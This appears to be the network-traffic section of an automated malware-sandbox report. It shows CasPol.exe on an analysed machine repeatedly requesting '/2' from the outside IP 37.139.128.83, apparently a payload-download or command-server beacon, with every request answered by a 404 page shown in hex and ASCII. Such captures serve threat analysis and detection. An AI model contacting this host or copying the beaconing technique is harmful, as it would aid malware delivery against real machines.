                                                    Mar 20, 2023 13:23:16.934954882 CET4986380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:21.440457106 CET4986380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:21.440877914 CET4986480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:21.458837986 CET804986337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:21.458900928 CET804986437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:21.459194899 CET4986480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:21.459638119 CET4986480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:21.510338068 CET804986437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:21.510406017 CET804986437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:21.510452032 CET804986437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:21.510493040 CET804986437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:21.510539055 CET804986437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:21.510623932 CET4986480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:21.510687113 CET4986480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:27.031553984 CET804986437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:27.031851053 CET4986480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:31.516762018 CET4986480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:31.517106056 CET4986780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:31.534893036 CET804986437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:31.535064936 CET804986737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:31.535252094 CET4986780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:31.535437107 CET4986780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:31.623294115 CET804986737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:31.623338938 CET804986737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:31.623369932 CET804986737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:31.623399019 CET804986737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:31.623429060 CET804986737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:31.623591900 CET4986780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:31.623591900 CET4986780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:37.159677982 CET804986737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:37.160043001 CET4986780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:41.639292955 CET4986780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:41.639592886 CET4986880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:41.657773972 CET804986737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:41.657840014 CET804986837.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:41.658066034 CET4986880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:41.658135891 CET4986880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:41.731969118 CET804986837.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:41.732053041 CET804986837.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:41.732215881 CET4986880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:41.744688988 CET804986837.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:41.744771004 CET804986837.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:41.744826078 CET804986837.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:41.744853020 CET4986880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:41.744945049 CET4986880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:41.745130062 CET4986880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:47.262861013 CET804986837.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:47.263067007 CET4986880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:51.763251066 CET4986880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:51.763552904 CET4986980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:51.781378984 CET804986837.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:51.781577110 CET804986937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:51.781733990 CET4986980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:51.781950951 CET4986980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:51.810120106 CET804986937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:51.810159922 CET804986937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:51.810324907 CET804986937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:51.810340881 CET804986937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:51.810353994 CET804986937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:51.810520887 CET4986980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:23:57.298580885 CET804986937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:23:57.298773050 CET4986980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:01.824183941 CET4986980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:01.824743032 CET4987280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:01.842614889 CET804986937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:01.842983961 CET804987237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:01.843725920 CET4987280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:01.843806982 CET4987280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:01.929733038 CET804987237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:01.929783106 CET804987237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:01.929805994 CET804987237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:01.929902077 CET804987237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:01.929923058 CET804987237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:01.930332899 CET4987280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:07.453782082 CET804987237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:07.454061031 CET4987280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:11.945295095 CET4987280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:11.945919991 CET4987380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:11.963943958 CET804987237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:11.964046955 CET804987337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:11.964363098 CET4987380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:11.964451075 CET4987380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:12.030263901 CET804987337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:12.030352116 CET804987337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:12.030412912 CET804987337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:12.030468941 CET804987337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:12.030525923 CET804987337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:12.030550957 CET4987380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:12.030649900 CET4987380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:12.030718088 CET4987380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:17.520947933 CET804987337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:17.521183014 CET4987380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:22.036602974 CET4987380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:22.037225962 CET4987480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:22.054646969 CET804987337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:22.055212021 CET804987437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:22.055437088 CET4987480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:22.055651903 CET4987480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:22.127638102 CET804987437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:22.127703905 CET804987437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:22.127751112 CET804987437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:22.127794027 CET804987437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:22.127821922 CET4987480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:22.127840042 CET804987437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:22.127919912 CET4987480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:22.127959967 CET4987480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:24:27.661990881 CET804987437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:24:27.662184954 CET4987480192.168.11.2037.139.128.83

                                                    HTTP Request Dependency Graph

                                                    • 37.139.128.83

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.11.204979237.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:16:46.917243958 CET158OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:16:46.943846941 CET159INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:16:46 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:16:46.943917990 CET159INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:16:46.943964958 CET160INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:16:46.944006920 CET160INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:16:46.944081068 CET160INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.11.204979537.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:16:56.982340097 CET169OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:16:57.030054092 CET170INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:16:56 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:16:57.030136108 CET170INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:16:57.030189991 CET171INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:16:57.030237913 CET171INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:16:57.030291080 CET171INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    10192.168.11.204981237.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:18:28.087193966 CET234OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:18:28.117830992 CET234INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:18:28 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:18:28.117913008 CET235INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:18:28.117969036 CET235INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:18:28.118019104 CET235INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:18:28.118074894 CET235INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    11192.168.11.204981437.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:18:38.149235964 CET243OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:18:38.178752899 CET243INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:18:38 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:18:38.178833008 CET244INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:18:38.178886890 CET244INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:18:38.178935051 CET244INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:18:38.178988934 CET244INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    12192.168.11.204981637.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:18:48.207734108 CET252OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:18:48.283617020 CET253INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:18:48 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
